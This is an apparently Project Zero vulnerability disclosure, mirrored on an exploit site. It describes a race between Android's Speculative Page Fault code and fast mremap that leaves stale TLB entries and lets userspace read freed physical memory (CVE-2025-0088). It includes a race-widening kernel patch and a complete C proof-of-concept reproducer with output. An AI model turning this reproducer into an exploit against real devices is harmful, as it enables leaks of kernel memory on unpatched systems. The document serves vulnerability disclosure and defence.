Share
## https://sploitus.com/exploit?id=PACKETSTORM:189615
The AOSP 5.10/5.15 kernels contain a non-upstream memory management optimization called "Speculative Page Fault" (SPF). There have been a series of issues in this before, see https://project-zero.issues.chromium.org/42451518.
    
    One of the fixes that was made to Android's SPF code back then was https://android.googlesource.com/kernel/common/+/3e7526c6723968ce62ab2779256bed5cfc0340ec%5E%21/ ("ANDROID: disable page table moves when speculative page faults are enabled"), which disables the mremap() optimization that moves entire page tables at once for Android kernels. The commit message says:
    
        move_page_tables() can move entire pmd or pud without locking individual ptes. This is problematic for speculative page faults which do not take mmap_lock because they rely on ptl lock when writing new pte value. To avoid possible race, disable move_page_tables() optimization when CONFIG_SPECULATIVE_PAGE_FAULT is enabled.
    
    However, that mremap() optimization was brought back again a month later, in https://android.googlesource.com/kernel/common/+/af027c97fcf53bc7494a8c67b89c97381c1ea1ea%5E%21/ ("ANDROID: Make SPF aware of fast mremaps"). That commit message says:
    
        SPF attempts page faults without taking the mmap lock, but takes the PTL. If there is a concurrent fast mremap (at PMD/PUD level), this can lead to a UAF as fast mremap will only take the PTL locks at the PMD/PUD level. SPF cannot take the PTL locks at the larger subtree granularity since this introduces much contention in the page fault paths.
    
        To address the race:
    
            Fast mremaps wait until there are no users of the VMA.
            Speculative faults detect ongoing fast mremaps and fallback to conventional fault handling (taking mmap read lock).
    
        Since this race condition is very rare the performance impact is negligible.
    
    In its new form, the optimization relies on the per-VMA refcount introduced by SPF as a sort of lock to prevent concurrent mremap() and SPF handling on a VMA.
    
    The issue with this approach is that merging and splitting VMAs does not synchronize with SPF or propagate information about pending SPFs. Even after locking a page table and rechecking the SPF seqcount, an SPF only holds a reference to a VMA that at some point in time used to be associated with the virtual address being accessed and is roughly equivalent to the VMA that currently covers the address, but not necessarily a reference to the exact VMA object that currently covers the address. That refcount just keeps the right file object and anon_vma and such alive.
    
    So the following race is possible:
    
    task A                        task B
    ======                        ======
    <CoW page fault at address A begins>
      get_vma
        find_vma_from_tree
        atomic_inc_unless_negative(&vma->file_ref_count)
      do_handle_mm_fault
        __handle_mm_fault
          handle_pte_fault
            do_wp_page
              wp_page_copy
                pte_map_lock
                *** execution delayed here ***
                                  mprotect() [on address B in same VMA as address A]
                                    do_mprotect_pkey
                                      mprotect_fixup
                                        split_vma
                                          [address A is split off into new VMA]
                                  mremap(<address A>, ..., <address C>)
                                    mremap_to
                                      move_vma
                                        copy_vma
                                        move_page_tables
                                          move_pgt_entry [NORMAL_PMD]
                                            move_normal_pmd
                                              trylock_vma_ref_count
                                                [works, no SPF running on this VMA]
                                              [take PMD locks]
                                              [move PMD entry]
                                              flush_tlb_range(<address A>)
                                              [drop PMD locks]
                                              unlock_vma_ref_count
                ptep_clear_flush_notify(vma, <address A>, ...)           ***A***
                ...
                set_pte_at_notify(mm, <address A>, ...);
                page_remove_rmap
                put_page             ***B***
                pte_unmap_unlock
    
    At ***A***, task A attempts to use ptep_clear_flush_notify() to flush stale TLB entries for the PTE that was just removed; but while task A thinks it is removing a PTE for virtual address A, it is actually removing one for virtual address C because move_normal_pmd() has moved the page table containing the PTE in the meantime. So the TLB flush is directed to the wrong address and has no effect.
    
    At ***B***, task A then drops the reference that was previously held by the page tables on the page. At this point, the page is freed, and if a stale TLB entry remains, it now allows userspace to read freed memory.
    
    The good news is that (at least as far as I can tell) stale TLB entries caused by this bug will always be read-only; so this is effectively a physical-memory use-after-free read, but not a physical-memory use-after-free write.
    reproducer
    
    I tested this on the android14-5.15 AOSP kernel branch (at commit f4552ca3639d6f3e7c83e58fb4388d6e8b006612).
    
    To make the issue easier to hit, I patched the kernel like this to artificially widen the race window:
    
    diff --git a/mm/memory.c b/mm/memory.c
    index 82a1783114a6..358db1219df8 100644
    --- a/mm/memory.c
    +++ b/mm/memory.c
    @@ -75,6 +75,7 @@
     #include <linux/perf_event.h>
     #include <linux/ptrace.h>
     #include <linux/vmalloc.h>
    +#include <linux/delay.h>
     #include <trace/hooks/mm.h>
    
     #include <trace/events/kmem.h>
    @@ -3249,6 +3250,14 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
                    entry = pte_sw_mkyoung(entry);
                    entry = maybe_mkwrite(pte_mkdirty(entry), vma);
    
    +               if (strcmp(current->comm, "SLOWME") == 0 && vmf->address == 0x201000) {
    +                       pr_warn("%s: begin slowdown on WP fault, speculative=%d, page_count(old_page)=%d\n",
    +                               __func__, !!(vmf->flags & FAULT_FLAG_SPECULATIVE), page_count(old_page));
    +                       mdelay(2000);
    +                       pr_warn("%s: end slowdown on WP fault, page_count(old_page=%d)\n",
    +                               __func__, page_count(old_page));
    +               }
    +
                    /*
                     * Clear the pte entry and flush it first, before updating the
                     * pte with the new entry, to keep TLBs on different CPUs in
    
    Then I built the kernel for X86 with my own kernel config, with includes CONFIG_PAGE_POISONING=y, and booted it with the page_poison=1 command line flag.
    
    Then I wrote this reproducer:
    
    #define _GNU_SOURCE
    #include <pthread.h>
    #include <err.h>
    #include <unistd.h>
    #include <assert.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/prctl.h>
    
    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })
    
    static void pin_task_to(int pid, int cpu) {
      cpu_set_t cset;
      CPU_ZERO(&cset);
      CPU_SET(cpu, &cset);
      SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
    }
    static void pin_to(int cpu) { pin_task_to(0, cpu); }
    
    // PMD size plus one more page
    #define MAP_LEN 0x201000
    
    // our kernel cheat expects the source mapping to be at 0x201000
    #define entry_off 0x1000LU
    
    static volatile unsigned long *p;
    
    static void *thread_fn(void *dummy) {
      pin_to(0);
      SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
      // Trigger CoW fault; this will copy page contents into a new page and drop
      // the page tables' reference on the old page.
      // This is where the kernel cheat patch will inject a 2-second delay.
      // This is where the misdirected TLB flush is issued.
      *p = 2;
      SYSCHK(prctl(PR_SET_NAME, "SLOWME-post"));
      sleep(2);
      // Make sure we don't get stuck in an infinite loop on the main thread
      printf("looks like we failed somehow\n");
      exit(1);
      return NULL;
    }
    
    int main(void) {
      void *map = SYSCHK(mmap((void*)0x200000, MAP_LEN, PROT_READ|PROT_WRITE,
              MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED_NOREPLACE, -1, 0));
      void *dst_map = SYSCHK(mmap((void*)0x600000, MAP_LEN, PROT_NONE,
              MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED_NOREPLACE, -1, 0));
      p = (volatile unsigned long *)(map+entry_off);
      // create writable anon page at 0x200000, and write 1 into it
      *p = 1;
    
      // elevate page refcount
      int pipefds[2];
      SYSCHK(pipe(pipefds));
      struct iovec iov = { .iov_base = (void*)p, .iov_len = 0x1000 };
      SYSCHK(vmsplice(pipefds[1], &iov, 1, 0));
    
      // make the PTE RO
      SYSCHK(mprotect(map, MAP_LEN, PROT_READ));
      SYSCHK(mprotect(map, MAP_LEN, PROT_READ|PROT_WRITE));
    
      pthread_t thread;
      if (pthread_create(&thread, NULL, thread_fn, NULL))
        errx(1, "pthread_create");
    
      pin_to(1);
    
      // wait for thread to enter SPF
      sleep(1);
    
      // drop elevated page refcount
      close(pipefds[0]);
      close(pipefds[1]);
    
      SYSCHK(prctl(PR_SET_NAME, "TRACEME"));
    
      // split VMA at PMD boundary, such that 0x200000-0x400000 is now covered by a
      // new VMA.
      // the old VMA (which is referenced by the SPF) now only covers
      // 0x400000-0x401000.
      SYSCHK(mprotect(map+0x200000, 0x1000, PROT_READ));
    
      // move 0x200000-0x400000 to 0x600000-0x800000.
      // MREMAP_DONTUNMAP ensures that when the thread returns out of SPF handling
      // and restarts the memory access, it won't crash.
      SYSCHK(mremap(map, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED|MREMAP_DONTUNMAP, dst_map));
      SYSCHK(prctl(PR_SET_NAME, "TRACEME-post"));
    
      // Kinda magic: We keep reading from 0x601000 (the address to which we moved
      // the page that was at 0x201000, which we wrote 1 into) in a tight loop.
      // This has multiple important aspects:
      //
      // 1. Whenever the CPU core does not have a TLB entry at 0x601000, such a TLB
      //    entry is created by the memory read.
      // 2. Because we're in a tight loop, the TLB entry probably won't get evicted
      //    much (except when handling interrupts or such).
      // 3. As long as we have a TLB entry at 0x601000, we keep reading through it,
      //    even after it has become stale, until we see a value other than 1.
      unsigned long val;
      do { val = *(volatile unsigned long *)(dst_map+entry_off); } while (val == 1);
    
      printf("final value: 0x%lx\n", val);
    }
    
    and built and ran it like so:
    
    $ gcc -o spf-new-mremap-tlb-race spf-new-mremap-tlb-race.c -pthread -Wall -O2
    $ while true; do ./spf-new-mremap-tlb-race ; done
    looks like we failed somehow
    looks like we failed somehow
    final value: 0xaaaaaaaaaaaaaaaa
    final value: 0xaaaaaaaaaaaaaaaa
    looks like we failed somehow
    final value: 0xaaaaaaaaaaaaaaaa
    
    0xaa is the PAGE_POISON kernel constant that freed pages are filled with when CONFIG_PAGE_POISONING=y and page_poison=1 are enabled, demonstrating that userspace is reading the contents of pages that the kernel page allocator considers to be free.
    other issues in SPF
    
    While looking at this, I also noticed two other weird things:
    
        On LTS kernels before 6.1, kernel stack expansion happens under the mmap lock in read mode, so I think it won't trigger SPF seqcount bumps. I think this means that the pvma = *vma assignment in arch fault handler code can race with concurrent updates to the VMA start address, so theoretically there is no protection against a torn start address being stored in the copied VMA. However, it looks like it probably works out okay with the kernel's memcpy() implementation on arm64 (at least if the size and alignment of vm_area_struct stay the same).
        In __handle_mm_fault(), the call to pte_offset_map() looks racy: Instead of calling pte_offset_map() like in gup_pte_range() (by passing in a pointer to an on-stack copy of the PMD value), it seems to pass in a pointer to the original PMD, which means the PMD can have a different value (and even type) than the READ_ONCE() before and after observe. In theory, this could probably cause a kernel crash, but you'd have to win two really tight races at least on 64-bit to trigger it.
    
    disclosure deadline
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-03.
    
    For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html
    
    Please credit me as "Jann Horn of Google Project Zero".
    
    Related CVE Number: CVE-2025-0088.